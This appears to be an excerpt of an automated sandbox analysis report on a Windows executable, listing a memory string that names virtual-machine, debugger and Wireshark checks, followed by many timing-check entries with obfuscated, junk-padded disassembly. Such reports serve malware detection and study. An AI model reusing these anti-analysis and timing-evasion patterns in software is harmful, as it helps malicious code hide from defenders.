Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 95e1Fwp61u.exe, 00000000.00000003.1735041108.0000000007D80000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D474F second address: 15D4754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D4754 second address: 15D475E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D523C second address: 15D5250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F19CD112F6Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D4F98 second address: 15D4F9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5250 second address: 15D5256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D4F9E second address: 15D4FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5256 second address: 15D525A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5AC4 second address: 15D5AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F19CCBA87B6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5AD8 second address: 15D5ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D6557 second address: 15D6572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F19CCBA87BDh 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D6572 second address: 15D6576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D72BC second address: 15D731B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007F19CCBA87BEh 0x00000010 push edi 0x00000011 ja 00007F19CCBA87B6h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F19CCBA87B8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 xor esi, 0260B988h 0x0000003a push 00000000h 0x0000003c sub esi, dword ptr [ebp+122D1B8Ah] 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 jnl 00007F19CCBA87B6h 0x0000004b pop eax 0x0000004c jg 00007F19CCBA87BCh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DA973 second address: 15DA977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DA977 second address: 15DA97D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DA97D second address: 15DA992 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19CD112F70h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7063 second address: 15D7071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7071 second address: 15D7076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DC92E second address: 15DC932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DC932 second address: 15DC938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7AD9 second address: 15D7ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DDAB6 second address: 15DDACB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jo 00007F19CD112F68h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7ADD second address: 15D7AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DF9A2 second address: 15DF9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E08A4 second address: 15E08AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DCA48 second address: 15DCAF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19CD112F79h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F19CD112F68h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D3937h] 0x0000002f push dword ptr fs:[00000000h] 0x00000036 clc 0x00000037 jnp 00007F19CD112F6Ch 0x0000003d or ebx, 2D791D75h 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov bx, dx 0x0000004d mov eax, dword ptr [ebp+122D0EF5h] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edx 0x00000058 call 00007F19CD112F68h 0x0000005d pop edx 0x0000005e mov dword ptr [esp+04h], edx 0x00000062 add dword ptr [esp+04h], 0000001Ah 0x0000006a inc edx 0x0000006b push edx 0x0000006c ret 0x0000006d pop edx 0x0000006e ret 0x0000006f xor ebx, dword ptr [ebp+122D18DFh] 0x00000075 js 00007F19CD112F6Ch 0x0000007b mov dword ptr [ebp+12457620h], edi 0x00000081 nop 0x00000082 jbe 00007F19CD112F6Eh 0x00000088 push ebx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E185A second address: 15E185E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DEC24 second address: 15DECBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, 5C4B8814h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F19CD112F68h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 jmp 00007F19CD112F75h 0x0000003b mov eax, dword ptr [ebp+122D00F9h] 0x00000041 call 00007F19CD112F74h 0x00000046 or dword ptr [ebp+122D3322h], esi 0x0000004c pop edi 0x0000004d push FFFFFFFFh 0x0000004f jbe 00007F19CD112F6Ch 0x00000055 or dword ptr [ebp+122D33A5h], esi 0x0000005b nop 0x0000005c push ecx 0x0000005d push ebx 0x0000005e jp 00007F19CD112F66h 0x00000064 pop ebx 0x00000065 pop ecx 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a push eax 0x0000006b pop eax 0x0000006c push edi 0x0000006d pop edi 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DECBA second address: 15DECC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DECC0 second address: 15DECC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E09B6 second address: 15E09BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DFB4B second address: 15DFBD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D360Ch], edi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov bx, 196Ah 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 jmp 00007F19CD112F6Ch 0x00000027 mov eax, dword ptr [ebp+122D07D1h] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F19CD112F68h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push edi 0x0000004c call 00007F19CD112F68h 0x00000051 pop edi 0x00000052 mov dword ptr [esp+04h], edi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc edi 0x0000005f push edi 0x00000060 ret 0x00000061 pop edi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D3907h] 0x00000069 push eax 0x0000006a pushad 0x0000006b jo 00007F19CD112F6Ch 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3902 second address: 15E390B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E390B second address: 15E3980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F19CD112F68h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D393Fh] 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+122D195Ah], edi 0x00000035 xchg eax, esi 0x00000036 jmp 00007F19CD112F70h 0x0000003b push eax 0x0000003c pushad 0x0000003d pushad 0x0000003e jmp 00007F19CD112F78h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E4996 second address: 15E49B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F19CCBA87BEh 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E49B3 second address: 15E49BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F19CD112F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E49BD second address: 15E4A2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19CCBA87B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D35CFh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F19CCBA87B8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+1247D5DEh], esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007F19CCBA87B8h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 cmc 0x00000052 push eax 0x00000053 push edi 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 pop eax 0x00000058 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E5902 second address: 15E5916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CD112F6Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3AD5 second address: 15E3AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3AD9 second address: 15E3ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E3ADD second address: 15E3AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8AF9 second address: 15E8AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E4B64 second address: 15E4BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F19CCBA87B8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 sub edi, dword ptr [ebp+122D36F3h] 0x0000002c push dword ptr fs:[00000000h] 0x00000033 xor dword ptr [ebp+1247D5DEh], ebx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov dword ptr [ebp+122D58BCh], esi 0x00000046 mov eax, dword ptr [ebp+122D1291h] 0x0000004c mov ebx, dword ptr [ebp+1247D834h] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007F19CCBA87B8h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 00000014h 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e mov ebx, dword ptr [ebp+122D18C6h] 0x00000074 nop 0x00000075 push eax 0x00000076 push edx 0x00000077 jc 00007F19CCBA87B8h 0x0000007d push eax 0x0000007e pop eax 0x0000007f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8AFD second address: 15E8B07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E4BEE second address: 15E4BF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E6C59 second address: 15E6C5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8D21 second address: 15E8D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8D2D second address: 15E8D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E8D31 second address: 15E8D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC32 second address: 15ECC56 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F19CD112F7Eh 0x00000008 jmp 00007F19CD112F78h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC56 second address: 15ECC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC60 second address: 15ECC74 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC74 second address: 15ECC87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15ECC87 second address: 15ECC8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F45C5 second address: 15F45CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F45CB second address: 15F45CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F3D72 second address: 15F3D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F19CCBA87B6h 0x0000000a jmp 00007F19CCBA87C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F5C02 second address: 15F5C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F754F second address: 15F7555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F7555 second address: 15F7562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F19CD112F72h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F7562 second address: 15F7568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F7568 second address: 15F758A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F19CD112F6Eh 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007F19CD112F66h 0x00000012 popad 0x00000013 push edx 0x00000014 jbe 00007F19CD112F72h 0x0000001a jno 00007F19CD112F66h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F8C2D second address: 15F8C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15F8C33 second address: 15F8C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push esi 0x00000007 pushad 0x00000008 jne 00007F19CD112F66h 0x0000000e jmp 00007F19CD112F71h 0x00000013 jno 00007F19CD112F66h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD164 second address: 15FD16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD16C second address: 15FD172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD172 second address: 15FD176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD176 second address: 15FD1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19CD112F77h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F19CD112F6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F19CD112F76h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD1BE second address: 15FD1D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD1D7 second address: 15FD1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F19CD112F66h 0x0000000e jmp 00007F19CD112F6Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FD1EF second address: 15FD223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C5h 0x00000007 jmp 00007F19CCBA87C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF41F second address: 15FF441 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F19CD112F71h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15FF441 second address: 15FF448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
